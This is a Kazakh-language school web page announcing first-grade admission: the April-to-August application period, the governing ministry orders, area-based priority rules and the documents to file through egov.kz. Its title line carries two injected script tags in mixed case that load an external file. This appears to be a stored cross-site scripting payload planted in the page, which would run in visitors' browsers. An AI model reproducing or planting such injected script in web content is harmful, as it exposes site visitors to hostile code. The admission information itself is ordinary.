1 сыныпқа құжаттарды қабылдау.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

11.06.2021

1 сыныпқа құжаттарды қабылдау.

1 сыныпқа құжаттарды қабылдау 1 сәуірде басталып, 1 тамызға дейін жалғасады.  Бұл оқу процесінің барлық қатысушыларына ыңғайлы болу үшін  жасалды.  

Қазақстан Республикасы Білім және ғылым министрінің 2018 жылғы 12 қазандағы №564 бұйрығына сәйкес.

2 тарау. Бастауыш, негізгі орта, жалпы орта білім берудің  жалпы білім беретін оқу бағдарламаларын  іске асыратын білім беру ұйымдарына оқуға қабылдау тәртібі.

 Ереже ҚР Білім және ғылым министрінің 2020 жылғы 24 маусымдағы №264 бұйрығына сәйкес  9-5 тармағымен толықтырылды.  

Көрсетілетін қызметті беруші қабылдау кезінде ағымдағы жылдың 1 қыркүйегінен бастап білім беру ұйымының қызмет көрсету аумағынан өтініш берген бірінші үш көрсетілетін қызметті алушыға, содан кейін ағымдағы жылдың 1 қыркүйегінен бастап бірінші болып тіркелгендер қатарынан білім беру ұйымының қызмет көрсету аумағынан тыс 1 (бір) үміткерге қабылдау туралы хабарлама жібереді.

  🔸 Ата-аналар алдын-ала мекепті анықтап, қажетті құжаттарды уақытында тапсырып, оқу жабдықтарын жинай алады.

🔸 Мектеп басшылығы сыныптарды алдын ала жинақтап, оқулықтардың қажетті санын сатып алып, сағаттарды бөліп, педагогтардың құрамын анықтайды.

Келесі құжаттарды ұсына отырып, өтінішті  egov.kz арқылы беруге болады:

✅ ата-аналардың (немесе оларды алмастыратын адамдардың) өтініші;

✅ баланың туу туралы куәлігінің көшірмесі;

✅ «Баланың денсаулық паспорты» 026/у-3 нысаны бойынша денсаулық жағдайы туралы құжат;

✅ 063/у нысаны бойынша денсаулық жағдайы туралы құжат;

✅ 3х4 екі фото сурет

❗ Өтініш 1 жұмыс күні қарастырылады. 

Просмотров: 432


Пікір қосу



Деректерді қолтаңбаға қосу